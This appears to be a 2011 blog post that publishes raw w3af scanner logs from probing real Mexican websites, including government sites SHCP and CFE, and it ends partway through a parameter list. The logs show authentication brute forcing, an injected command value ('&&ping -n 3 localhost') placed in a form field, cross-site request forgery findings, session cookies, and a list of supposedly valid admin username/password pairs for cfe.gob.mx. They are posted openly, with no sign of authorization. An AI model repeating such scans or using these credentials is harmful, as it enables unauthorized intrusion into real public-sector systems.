[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.getMails
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.lang
[Wed 25 May 2011 03:26:56 PM CDT] The page language is: es
[Wed 25 May 2011 03:26:57 PM CDT] The server header for the remote web server is: "nginx/0.7.67". This information was found in the request with id 194.
[Wed 25 May 2011 03:27:18 PM CDT] A fake FrontPage Configuration Information file was found at: "http://www.iniciativamexico.org/_vti_inf.html". This may be an indication of a honeypot, a WAF or an IPS. This information was found in the request with id 244.
[Wed 25 May 2011 03:27:18 PM CDT] New URL found by frontpage_version plugin: http://www.iniciativamexico.org/_vti_inf.html
[Wed 25 May 2011 03:27:18 PM CDT] Starting formAuthBrute plugin execution.
[Wed 25 May 2011 03:27:18 PM CDT] Starting basicAuthBrute plugin execution.
[Wed 25 May 2011 03:27:18 PM CDT] Found 4 URLs and 10 different points of injection.
[Wed 25 May 2011 03:27:18 PM CDT] The list of URLs is:
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/_vti_inf.html
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/save_invitacion
[Wed 25 May 2011 03:27:18 PM CDT] The list of fuzzable requests is:
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org | Method: GET
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/_vti_inf.html | Method: GET
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="0", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="3", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="0", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="3", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/save_invitacion | Method: POST | Parameters: (data[Friend][mail]="E-mail de ...", _method="POST", data[Prospect][nombre]="Tu Nombre ...", data[Prospect][mail]="Tu e-mail:")
[Wed 25 May 2011 03:27:25 PM CDT] The web application sent a persistent cookie.
[Wed 25 May 2011 03:27:25 PM CDT] The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):
[Wed 25 May 2011 03:27:25 PM CDT] - The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:27:25 PM CDT] - The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:27:45 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:31:06 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/save_invitacion
[Wed 25 May 2011 03:31:06 PM CDT] The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:31:06 PM CDT] The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:31:06 PM CDT] A fake FrontPage Configuration Information file was found at: "http://www.iniciativamexico.org/_vti_inf.html". This may be an indication of a honeypot, a WAF or an IPS. This information was found in the request with id 244.
[Wed 25 May 2011 03:31:06 PM CDT] The server header for the remote web server is: "nginx/0.7.67". This information was found in the request with id 194.
[Wed 25 May 2011 03:31:06 PM CDT] The URL "http://www.iniciativamexico.org/" has the following allowed methods: GET, HEAD, POST.
[Wed 25 May 2011 03:31:36 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:31:54 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:31:54 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:05 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:43 PM CDT] A possible OS Commanding was found at: "http://www.iniciativamexico.org/registro_corto", using HTTP method POST. The sent post-data was: "...data[usuario][mail1]=&&ping -n 3 localhost..."Please review manually. This information was found in the request with id 5175.
[Wed 25 May 2011 03:45:46 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:48 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:49 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:46:56 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:47:11 PM CDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Wed 25 May 2011 03:50:40 PM CDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Wed 25 May 2011 03:50:42 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:07 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:21 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:24 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:47 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:51:57 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:56:48 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:57:43 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:58:13 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 04:10:46 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 04:10:50 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 04:10:52 PM CDT] Password profiling TOP 100:
[Wed 25 May 2011 04:10:52 PM CDT] - [85] Programas with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [86] requiere with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [87] requisitos with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [88] buscas with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [89] quieres with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [90] return with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [91] fortalecer with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [92] Ventures with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [93] Proyectos with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [94] previo with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [95] Resultados with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [96] Importantes with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [97] mucho with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [98] forman with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [99] ejemplares with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [100] consentimiento with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] The cookie: "CAKEPHP=g5i4raul0ohnendqo9k10d5ap6; expires=Mon, 30-Jan-2012 20:27:24 GMT; path=/" was sent by these URLs:
[Wed 25 May 2011 04:10:52 PM CDT] - http://www.iniciativamexico.org/
[Wed 25 May 2011 04:10:52 PM CDT] Finished scanning process.


osCommanding

A possible OS Commanding was found at: "http://www.iniciativamexico.org/registro_corto", using HTTP method POST. The sent post-data was: "...data[usuario][mail1]=&&ping -n 3 localhost...". Please review manually. This information was found in the request with id 5175.

GET http://www.iniciativamexico.org/ HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Host: www.iniciativamexico.org
Cookie: CAKEPHP=g5i4raul0ohnendqo9k10d5ap6
Content-type: application/x-www-form-urlencoded


xsrf

posr_xsrf

Cross-site request forgery vulnerability

The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

Here is a video: http://www.youtube.com/watch?v=CiXEFD-cTnw&feature=player_embedded

There you have it.

Greetings, Free World.

Cross-Site Request Forgery Vulnerability

Greetings, Free World.

Here is a possible vulnerability at SHCP.

http://www.shcp.gob.mx/Paginas/defaul.aspx



[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: grep.collectCookies

[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: grep.httpAuthDetect

[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: grep.error500

[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: discovery.serverHeader

[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: discovery.allowedMethods

[Wed 25 May 2011 10:16:31 AM CDT] Auto-enabling plugin: discovery.frontpage_version

[Wed 25 May 2011 10:16:31 AM CDT] Auto-enabling plugin: grep.passwordProfiling

[Wed 25 May 2011 10:16:31 AM CDT] Auto-enabling plugin: grep.getMails

[Wed 25 May 2011 10:16:31 AM CDT] Auto-enabling plugin: grep.lang

[Wed 25 May 2011 10:16:33 AM CDT] The page language is: es

[Wed 25 May 2011 10:16:33 AM CDT] The server header for the remote web server is: "Microsoft-IIS/6.0". This information was found in the request with id 15.

[Wed 25 May 2011 10:16:33 AM CDT] "x-powered-by" header for this HTTP server is: "ASP.NET". This information was found in the request with id 16.

[Wed 25 May 2011 10:16:33 AM CDT] "x-aspnet-version" header for this HTTP server is: "2.0.50727". This information was found in the request with id 16.

[Wed 25 May 2011 10:16:34 AM CDT] The resource: "http://www.shcp.gob.mx/Paginas/" requires authentication. The realm is: "NTLM". This information was found in the request with id 17.

[Wed 25 May 2011 10:16:46 AM CDT] The FrontPage Configuration Information file was found at: "http://www.shcp.gob.mx/_vti_inf.html" and the version of FrontPage Server Extensions is: "12.0.0.000". This information was found in the request with id 66.

[Wed 25 May 2011 10:16:46 AM CDT] The FPAdminScriptUrl is at: "_vti_bin/_vti_adm/admin.dll" instead of the default location: "_vti_bin/_vti_adm/admin.exe". This information was found in the request with id 66.

[Wed 25 May 2011 10:16:46 AM CDT] The FPAuthorScriptUrl is at: "_vti_bin/_vti_aut/author.dll" instead of the default location: "/_vti_bin/_vti_adm/author.exe". This information was found in the request with id 66.

[Wed 25 May 2011 10:16:46 AM CDT] New URL found by frontpage_version plugin: http://www.shcp.gob.mx/_vti_inf.html

[Wed 25 May 2011 10:16:46 AM CDT] Starting formAuthBrute plugin execution.

[Wed 25 May 2011 10:16:46 AM CDT] Starting basicAuthBrute plugin execution.

[Wed 25 May 2011 10:16:46 AM CDT] Starting basic authentication bruteforce on URL: "http://www.shcp.gob.mx/Paginas/".

[Wed 25 May 2011 10:16:57 AM CDT] No more user/password combinations available.

[Wed 25 May 2011 10:29:16 AM CDT] Found 3 URLs and 3 different points of injection.

[Wed 25 May 2011 10:29:16 AM CDT] The list of URLs is:

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/Paginas/defaul.aspx

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/_layouts/error.aspx

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/_vti_inf.html

[Wed 25 May 2011 10:29:16 AM CDT] The list of fuzzable requests is:

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/Paginas/defaul.aspx | Method: GET

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/_layouts/error.aspx | Method: POST | Parameters: (__spDummyText2="", __VIEWSTATE="/wEPDwUKLT...", __spDummyText1="")

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/_vti_inf.html | Method: GET

[Wed 25 May 2011 10:29:17 AM CDT] The resource: "http://www.shcp.gob.mx/_layouts/error.aspx" requires authentication. The realm is: "NTLM". This information was found in the request with id 11797.

[Wed 25 May 2011 10:29:17 AM CDT] The web application sent a persistent cookie.

[Wed 25 May 2011 10:29:17 AM CDT] The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):

[Wed 25 May 2011 10:29:17 AM CDT] - The URL: http://www.shcp.gob.mx/_layouts/error.aspx is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

[Wed 25 May 2011 10:29:24 AM CDT] The URL: http://www.shcp.gob.mx/_layouts/error.aspx is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

[Wed 25 May 2011 10:29:24 AM CDT] The FrontPage Configuration Information file was found at: "http://www.shcp.gob.mx/_vti_inf.html" and the version of FrontPage Server Extensions is: "12.0.0.000". This information was found in the request with id 66.

[Wed 25 May 2011 10:29:24 AM CDT] "x-powered-by" header for this HTTP server is: "ASP.NET". This information was found in the request with id 16.

[Wed 25 May 2011 10:29:24 AM CDT] The resource: "http://www.shcp.gob.mx/Paginas/" requires authentication. The realm is: "NTLM". This information was found in the request with id 17.

[Wed 25 May 2011 10:29:24 AM CDT] The resource: "http://www.shcp.gob.mx/_layouts/error.aspx" requires authentication. The realm is: "NTLM". This information was found in the request with id 11797.

[Wed 25 May 2011 10:29:24 AM CDT] The URL: "http://www.shcp.gob.mx/Paginas/defaul.aspx" sent the cookie: "ASP.NET_SessionId=xisilge3lt2l0a45byyqt3ur; path=/; HttpOnly". This information was found in the request with id 1.

[Wed 25 May 2011 10:29:48 AM CDT] The resource: "http://www.shcp.gob.mx/Paginas/GKVFE" requires authentication. The realm is: "NTLM". This information was found in the request with id 11947.

[Wed 25 May 2011 10:29:51 AM CDT] The resource: "http://www.shcp.gob.mx/qmvDP" requires authentication. The realm is: "NTLM". This information was found in the request with id 11955.

[Wed 25 May 2011 10:29:52 AM CDT] The resource: "http://www.shcp.gob.mx/" requires authentication. The realm is: "NTLM". This information was found in the request with id 11957.

[Wed 25 May 2011 10:30:25 AM CDT] Password profiling TOP 100:

[Wed 25 May 2011 10:30:25 AM CDT] - [1] gearPage with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [2] este with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [3] esta with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [4] Windows with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [5] SharePoint with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [6] Volver with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [7] problemas with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [8] sitio with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [9] agregado with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [10] elemento with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [11] existe with 3 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [12] entorno with 3 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] The URL: "http://www.shcp.gob.mx/Paginas/defaul.aspx" sent these cookies:

[Wed 25 May 2011 10:30:25 AM CDT] - ASP.NET_SessionId=xisilge3lt2l0a45byyqt3ur; Path=/

[Wed 25 May 2011 10:30:25 AM CDT] - ASP.NET_SessionId=xisilge3lt2l0a45byyqt3ur; path=/; HttpOnly

[Wed 25 May 2011 10:30:25 AM CDT] Finished scanning process.

The URL: http://www.shcp.gob.mx/_layouts/error.aspx is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

There you have it.

Greetings, Free World.

Tuesday, May 24, 2011

Vulnerability at CFE

Greetings, Free World.

Here is a vulnerability in the CFE website.

[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.collectCookies
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.error500
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.getMails
[Tue 24 May 2011 11:31:24 PM CDT] Auto-enabling plugin: grep.lang
[Tue 24 May 2011 11:31:30 PM CDT] The page language is: es
[Tue 24 May 2011 11:31:31 PM CDT] The server header for the remote web server is: "Microsoft-IIS/6.0". This information was found in the request with id 18.
[Tue 24 May 2011 11:31:31 PM CDT] "x-powered-by" header for this HTTP server is: "ASP.NET". This information was found in the request with id 20.
[Tue 24 May 2011 11:31:31 PM CDT] "x-aspnet-version" header for this HTTP server is: "2.0.50727". This information was found in the request with id 20.
[Tue 24 May 2011 11:31:31 PM CDT] The resource: "http://www.cfe.gob.mx/" requires authentication. The realm is: "NTLM". This information was found in the request with id 21.
[Tue 24 May 2011 11:31:54 PM CDT] The FrontPage Configuration Information file was found at: "http://www.cfe.gob.mx/_vti_inf.html" and the version of FrontPage Server Extensions is: "12.0.0.000". This information was found in the request with id 74.
[Tue 24 May 2011 11:31:54 PM CDT] The FPAdminScriptUrl is at: "_vti_bin/_vti_adm/admin.dll" instead of the default location: "_vti_bin/_vti_adm/admin.exe". This information was found in the request with id 74.
[Tue 24 May 2011 11:31:54 PM CDT] The FPAuthorScriptUrl is at: "_vti_bin/_vti_aut/author.dll" instead of the default location: "/_vti_bin/_vti_adm/author.exe". This information was found in the request with id 74.
[Tue 24 May 2011 11:31:54 PM CDT] New URL found by frontpage_version plugin: http://www.cfe.gob.mx/_vti_inf.html
[Tue 24 May 2011 11:31:54 PM CDT] Starting formAuthBrute plugin execution.
[Tue 24 May 2011 11:31:54 PM CDT] Starting basicAuthBrute plugin execution.
[Tue 24 May 2011 11:31:54 PM CDT] Starting basic authentication bruteforce on URL: "http://www.cfe.gob.mx/".
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 95.
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 96.
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 97.
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 98.
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 99.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 100.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 101.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/d474b453. This vulnerability was found in the request with id 105.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 103.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/supervisor. This vulnerability was found in the request with id 102.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 104.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 106.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/4cc0un7. This vulnerability was found in the request with id 111.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/c0n7r0ll3r. This vulnerability was found in the request with id 112.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/letmein. This vulnerability was found in the request with id 109.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/999. This vulnerability was found in the request with id 114.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/codename. This vulnerability was found in the request with id 107.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/1111111. This vulnerability was found in the request with id 110.
[Tue 24 May 2011 11:32:00 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/xxxx. This vulnerability was found in the request with id 108.
[Tue 24 May 2011 11:32:00 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/55555. This vulnerability was found in the request with id 113.
[Tue 24 May 2011 11:34:05 PM CDT] Starting formAuthBrute plugin execution.
[Tue 24 May 2011 11:34:05 PM CDT] Starting basicAuthBrute plugin execution.
[Tue 24 May 2011 11:34:05 PM CDT] Found 4 URLs and 39 different points of injection.
[Tue 24 May 2011 11:34:05 PM CDT] The list of URLs is:
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/_vti_inf.html
[Tue 24 May 2011 11:34:05 PM CDT] The list of fuzzable requests is:
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx | Method: GET
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/ | Method: GET
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", 